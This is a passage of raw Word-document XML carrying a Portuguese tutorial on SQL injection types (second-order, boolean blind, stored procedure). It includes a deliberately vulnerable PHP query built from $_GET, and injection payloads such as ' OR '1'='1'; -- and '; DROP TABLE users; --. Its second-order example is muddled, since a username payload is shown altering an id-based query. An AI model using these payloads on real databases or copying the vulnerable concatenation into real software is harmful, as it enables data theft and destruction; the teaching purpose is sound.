        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B6B65">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Agora, imagine que um administrador tem a capacidade de visualizar os detalhes do usuário, incluindo a senha, através de uma consulta simples</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4977DB75" w14:textId="77777777" w:rsidR="004B6B65" w:rsidRDefault="004B6B65" w:rsidP="009D4C5A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="020423BB" w14:textId="77777777" w:rsidR="004B6B65" w:rsidRPr="00C450F9" w:rsidRDefault="004B6B65" w:rsidP="00750688">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Consulta para o administrador ver os detalhes do usuário</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0931865E" w14:textId="73DB5CB3" w:rsidR="004B6B65" w:rsidRPr="00C450F9" w:rsidRDefault="004B6B65" w:rsidP="00750688">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> id, username, password </w:t>
      </w:r>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> users </w:t>
      </w:r>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701DA212" w14:textId="77777777" w:rsidR="004B6B65" w:rsidRDefault="004B6B65" w:rsidP="004B6B65">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09890DD0" w14:textId="63525468" w:rsidR="004B6B65" w:rsidRDefault="004B6B65" w:rsidP="004B6B65">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B6B65">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Suponha que o sistema use uma abordagem ingênua para exibir mensagens de boas-vindas personalizadas e utilize diretamente os dados do usuário sem validar corretamente. Um código hipotético em PHP poderia ser algo assim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB11005" w14:textId="77777777" w:rsidR="004B6B65" w:rsidRDefault="004B6B65" w:rsidP="004B6B65">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D5F16AE" w14:textId="77777777" w:rsidR="004B6B65" w:rsidRPr="00C450F9" w:rsidRDefault="004B6B65" w:rsidP="00750688">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F5F28A" w14:textId="20C9E880" w:rsidR="004B6B65" w:rsidRPr="00C450F9" w:rsidRDefault="004B6B65" w:rsidP="00750688">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0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b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$userId</w:t>
      </w:r>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$_GET[</w:t>
      </w:r>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'user_id'];  //Assume que o usuário fornece o ID do usuário na URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D66968A" w14:textId="77777777" w:rsidR="004B6B65" w:rsidRPr="00C450F9" w:rsidRDefault="004B6B65" w:rsidP="00750688">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$query</w:t>
      </w:r>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "SELECT id, username, password FROM users WHERE id = </w:t>
      </w:r>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$userId";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A9F018" w14:textId="77777777" w:rsidR="004B6B65" w:rsidRPr="00C450F9" w:rsidRDefault="004B6B65" w:rsidP="00750688">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Executa a consulta e exibe os resultados...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3FE592" w14:textId="496C98E4" w:rsidR="004B6B65" w:rsidRPr="002512A2" w:rsidRDefault="004B6B65" w:rsidP="00750688">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002512A2">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E4ADF1" w14:textId="77777777" w:rsidR="004155C5" w:rsidRPr="002512A2" w:rsidRDefault="004155C5" w:rsidP="004B6B65">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC88780" w14:textId="2AABC107" w:rsidR="004155C5" w:rsidRDefault="004155C5" w:rsidP="004B6B65">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004155C5">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Aqui está onde ocorre a vulnerabilidade. Suponha que um usuário mal-intencionado se registre com o seguinte nome de usuário:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED6965E" w14:textId="77777777" w:rsidR="004155C5" w:rsidRDefault="004155C5" w:rsidP="004B6B65">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F9522E8" w14:textId="703CEBB0" w:rsidR="005E1E79" w:rsidRPr="0036287C" w:rsidRDefault="004155C5" w:rsidP="001E409F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0036287C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>usuario3</w:t>
      </w:r>
      <w:r w:rsidRPr="0036287C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' OR '1'='1'; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C501EB" w14:textId="77777777" w:rsidR="0036287C" w:rsidRDefault="0036287C" w:rsidP="004B6B65">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE7FE36" w14:textId="752A5614" w:rsidR="005E1E79" w:rsidRDefault="005E1E79" w:rsidP="004B6B65">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E1E79">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Os dados seriam armazenados no banco de dados, e o administrador, mais tarde, visualizaria os detalhes do usuário através da consulta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B45B7" w14:textId="0E3922FD" w:rsidR="005E1E79" w:rsidRPr="007804A9" w:rsidRDefault="005E1E79" w:rsidP="00586F21">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007804A9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="007804A9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> id, username, password </w:t>
      </w:r>
      <w:r w:rsidRPr="007804A9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="007804A9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> users</w:t>
      </w:r>
      <w:r w:rsidRPr="007804A9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="007804A9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> id = 3 </w:t>
      </w:r>
      <w:r w:rsidRPr="007804A9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OR '1'='1'; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D9BA7" w14:textId="77777777" w:rsidR="005E1E79" w:rsidRDefault="005E1E79" w:rsidP="004B6B65">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5124537B" w14:textId="5E632B52" w:rsidR="005E1E79" w:rsidRPr="005E1E79" w:rsidRDefault="005E1E79" w:rsidP="004B6B65">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E1E79">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Isso retorna todos os detalhes do usuário com id igual a 3 ou sempre verdadeiro ('1'='1'),</w:t>
      </w:r>
      <w:r w:rsidRPr="005E1E79">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> expondo os detalhes do usuário mal-intencionado. Este é um exemplo simplificado de Second-Order SQL Injection, onde a injeção ocorre em um estágio anterior, mas a execução real acontece em um estágio posterior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335B2004" w14:textId="77777777" w:rsidR="003D002C" w:rsidRPr="005E1E79" w:rsidRDefault="003D002C" w:rsidP="003D002C">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D3069BB" w14:textId="77777777" w:rsidR="003D002C" w:rsidRPr="00D56441" w:rsidRDefault="003D002C" w:rsidP="00D56441">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D56441">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Boolean-Based Blind SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4555370D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explora a resposta booleana (verdadeiro/falso) do banco de dados para inferir informações sobre a estrutura ou dados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712DBAF9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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username = 'admin' AND 1=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648CD4B2" w14:textId="77777777" w:rsidR="003D002C" w:rsidRPr="003D002C" w:rsidRDefault="003D002C" w:rsidP="003D002C">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026AC6B7" w14:textId="77777777" w:rsidR="003D002C" w:rsidRPr="003D002C" w:rsidRDefault="003D002C" w:rsidP="00D56441">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stored Procedure SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55560F74" w14:textId="77777777" w:rsidR="003D002C" w:rsidRPr="003D002C" w:rsidRDefault="003D002C" w:rsidP="003D002C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicação:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> O atacante injeta código SQL em procedimentos armazenados do banco de dados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EC768A" w14:textId="09C9CCD9" w:rsidR="0057338D" w:rsidRPr="0057338D" w:rsidRDefault="003D002C" w:rsidP="0057338D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXEC sp_executesql N'SELECT * FROM users WHERE username = ''admin'';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410F6BA6" w14:textId="77777777" w:rsidR="0057338D" w:rsidRDefault="0057338D" w:rsidP="0057338D">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="778B4F6E" w14:textId="3F32ED37" w:rsidR="0057338D" w:rsidRDefault="0057338D" w:rsidP="0057338D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0057338D">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Obs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0057338D">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">A consulta fornecida parece ser um exemplo de uma consulta SQL dinâmica usando </w:t>
      </w:r>
      <w:r w:rsidRPr="0057338D">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sp_executesql</w:t>
      </w:r>
      <w:r w:rsidRPr="0057338D">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> para selecionar todos os campos da tabela "users" onde o nome de usuário é 'admin'. No entanto, a forma como a string está sendo construída pode tornar a consulta suscetível a injeção de SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321087B5" w14:textId="77777777" w:rsidR="0057338D" w:rsidRPr="0057338D" w:rsidRDefault="0057338D" w:rsidP="0057338D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3673317D" w14:textId="77777777" w:rsidR="0057338D" w:rsidRDefault="0057338D" w:rsidP="0057338D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0057338D">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Um exemplo de código malicioso que pode ser injetado para explorar essa consulta é o seguinte:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303DB812" w14:textId="77777777" w:rsidR="009437F1" w:rsidRDefault="009437F1" w:rsidP="0057338D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7389C070" w14:textId="2F61395E" w:rsidR="009437F1" w:rsidRDefault="009437F1" w:rsidP="00F127AB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009437F1">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'; </w:t>
      </w:r>
      <w:r w:rsidRPr="009437F1">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DROP TABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="009437F1">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> users; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7353A16D" w14:textId="77777777" w:rsidR="00DD17E9" w:rsidRDefault="00DD17E9" w:rsidP="0057338D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E3E0A3" w14:textId="6D1D0A1D" w:rsidR="00DD17E9" w:rsidRDefault="00DD17E9" w:rsidP="0057338D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD17E9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Se esse código malicioso for injetado na consulta original, ela se tornará:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC0EF77" w14:textId="77777777" w:rsidR="00DD17E9" w:rsidRDefault="00DD17E9" w:rsidP="0057338D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7403B3DD" w14:textId="66D3EA13" w:rsidR="00DD17E9" w:rsidRDefault="00DD17E9" w:rsidP="005B6AAD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD17E9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXEC</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD17E9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sp_executesql N</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD17E9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'SELECT * FROM users WHERE username = ''; DROP TABLE users; --';</w:t>
      </w:r>
    </w:p>
